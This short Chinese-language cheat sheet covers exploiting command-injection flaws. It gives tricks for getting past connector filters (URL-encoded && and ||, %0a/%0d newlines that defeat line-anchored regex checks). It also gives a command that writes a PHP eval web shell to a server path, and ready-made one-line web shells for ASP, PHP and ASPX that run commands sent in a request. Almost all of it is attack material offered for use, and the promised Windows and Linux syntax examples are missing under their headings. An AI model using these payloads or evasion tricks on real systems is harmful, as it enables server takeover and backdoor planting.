命令执行漏洞利用及连接符的简单绕过

windows系统执行多条命令执行语法

Linux系统执行多命令执行语法

其中 单个的& 是后台运行

连接符的过滤绕过

1、URL编码绕过

• && 可以替换为 %26%26

• || 可以替换为 %7C%7C

2、特殊编码换行绕过（php代码）

• 将&&或者||替换为%0a或者%0d（注意：有时候需要%0a前面没有空格才可以成功）

• 在正则表达式中因为以'^'开头，以'$'结尾的只能匹配一行，也就是说我们可以用%0a，即url编码下的换行\n去绕过正则匹配

命令行中写shell

echo ^<?php @eval($_POST[x])?^>  > D:\wwwroot\x.php

不带空格的一句话木马：

ASP：<%execute(request("cmd"))%>
PHP：<?=@eval($_POST["cmd"]);?>
ASPX：<%@Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>